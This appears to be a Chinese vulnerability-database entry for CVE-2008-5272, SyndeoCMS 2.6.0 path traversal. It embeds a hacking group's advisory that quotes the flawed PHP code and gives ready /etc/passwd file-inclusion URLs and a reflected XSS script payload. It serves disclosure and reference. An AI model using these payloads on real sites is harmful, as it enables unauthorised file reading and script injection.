SyndeoCMS多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1184500 漏洞类型 路径遍历
发布时间 2008-11-28 更新时间 2009-01-29
CVE编号 CVE-2008-5272 CNNVD-ID CNNVD-200811-438
漏洞平台 N/A CVSS评分 4.0
|漏洞来源
https://cxsecurity.com/issue/WLB-2008120002
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200811-438
|漏洞详情
FredStuurmanSyndeoCMS存在多个目录遍历漏洞。远程验证用户可以借助对starnet/editors/fckeditor/studenteditor.php;starnet/modules/sn_news/edit_content.php,reachedthroughstarnet/index.php;和starnet/modules/sn_newsletter/edit_content.php,reachedthroughstarnet/index.php的模板参数中的一个..,读取任意文件。
|漏洞EXP
===========================================================
 SyndeoCMS 2.6.0 (LFI/XSS) Multiple Remote Vulnerabilities
===========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE : 10 June 2008
SITE : www.citec.us


#####################################################
 APPLICATION : SyndeoCMS
 VERSION     : 2.6.0 (Lastest Version)
 DOWNLOAD    : http://downloads.sourceforge.net/syndeocms
#####################################################

---LFI---

#################################################################
Vulnerable Code:
if (IsSet ($_GET['template']))
{
	$template_path = ...;
	$filename = $template_path . "/" . $_GET['template'];
	if (file_exists($filename))
	{
		$handle = fopen($filename, "r");
		$content = fread($handle, filesize($filename));
		fclose($handle);
	}
}
#################################################################

Vulnerable File: 

[+] starnet/editors/fckeditor/studenteditor.php
[+] starnet/modules/sn_news/edit_content.php
[+] starnet/modules/sn_newsletter/edit_content.php

Exploit:

[+] http://[target]/[path]/starnet/editors/fckeditor/studenteditor.php?template=../../../../../../../../../etc/passwd
[+] http://[target]/[path]/starnet/index.php?option=modulemanager&module=16&modoption=edit_article&cat_id=1&article_id=0&template=../../../../../../../../../../../../../etc/passwd
[+] http://[target]/[path]/starnet/index.php?option=modulemanager&module=17&modoption=edit_newsletter&newsletter_id=1&edition=1&template=../../../../../../../../../../../../../etc/passwd

Note:      - the first link requires pupil session (normal student session)
           - the second link and the third link require admin session


---XSS---

[+] index.php

Example:

http://[target]/[path]/index.php?page=1&section="><script>alert(111);</script>

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

update:
see: http://www.syndeocms.org/forum/index.php?topic=1788.0

|参考资料

来源:XF
名称:syndeocms-template-file-include(42969)
链接:http://xforce.iss.net/xforce/xfdb/42969
来源:BID
名称:29644
链接:http://www.securityfocus.com/bid/29644
来源:MILW0RM
名称:5779
链接:http://www.milw0rm.com/exploits/5779
来源:SREASON
名称:4660
链接:http://securityreason.com/securityalert/4660
来源:SECUNIA
名称:30602
链接:http://secunia.com/advisories/30602